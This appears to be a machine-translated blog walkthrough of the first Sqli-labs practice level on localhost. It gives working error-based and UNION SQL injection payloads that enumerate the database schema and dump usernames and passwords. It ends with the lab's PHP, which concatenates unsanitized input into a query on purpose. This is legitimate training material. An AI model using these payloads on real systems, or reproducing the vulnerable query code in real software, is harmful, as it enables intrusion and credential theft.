Sqli-labs-master First off: Error-based get single quote character injection

First come to the first pass:

http://127.0.0.1/sqli-labs-master/Less-1/

Test error with Statement http://127.0.0.1/sqli-labs-master/Less-1/?id=1 '

You can see an error in the SQL statement.

To test with and 1 = 1:

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1 ' and 1 = 1 23 echo Normal

%23 is the "#" comment

With and 1 = 2 go to test: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 ' and 1 = 2 23 back display failed, indicating there is an injection point.

Judgment field:

When order by 3, the Echo is normal:

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1 ' ORDER by 3%23

When order by 4, the Echo is not normal:

The Description field is 3.

Error display Echo Library:

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union Select%23

The echo of the place is 2 and 3.

Use version () to view versions:

Use database () to see the databases used by the current Web site:

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union Select 1,version (), database ()%23

As you can see, the PHP version used is 5.5.53, and the database name used by the website is security

Add. id=-1 ' UNION SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from information_schema.tables where Table_schema = ' security '%23 used Filter query statements where to view tables in the security database

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union Select 1, GROUP_CONCAT (table_name), 3 from Information_ Schema.tables WHERE table_schema = ' security '%23

See there are four of tables:

View columns in the users table

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union Select 1, Group_concat (column_name), 3 from Information_ Schema.columns WHERE table_name = ' users '%23

See what's in username and password:

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union select 1,username,password from Users%23

We see the users table also see the ID, we see how many sets of account password

Just add the Where id = N to the back

Tested ID Max is 14

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union select 1,username,password from users where id = 1%23

Http://127.0.0.1/sqli-labs-master/Less-1/?id=-1 ' Union select 1,username,password from users where id = 14%23

End of first close:

The second pass is updated quickly.

Statement: The official source code was changed by me. Attach the PHP code I changed:

<?php//including the mysql connect parameters.include (".. /sql-connections/sql-connect.php "); error_reporting (0);// take the variablesif (Isset ($_GET[' id ') ) {$id =$_get[' id '];//logging the connection parameters to a file for  Analysis. $FP =fopen (' Result.txt ', ' a '); Fwrite ($fp, ' ID: '. $id. " \ n "); fclose ($fp);// connectivity$sql=" select * from users where id= ' $id '   limit 0,1 "; $result =mysql_query ($sql); $row  = mysql_fetch_array ($result);echo  $sql; echo   "<br>"; if ($row) { echo  "<font size= ' 5 '  color=  ' #99FF00 ' >";  echo   ' your login name: ' .  $row [' username ']; echo  ' <br> '; echo  ' Your  password: '   $row [' Password ']; echo  ' </font> '; }else{echo  ' <font  color=  "#FFFF00" > ';p rint_r (Mysql_error ());echo  "</font>";}} Else { echo&nbSP; " Please input the id as parameter with numeric value ";}? >

Public Number:

Sqli-labs-master First off: Error-based get single quote character injection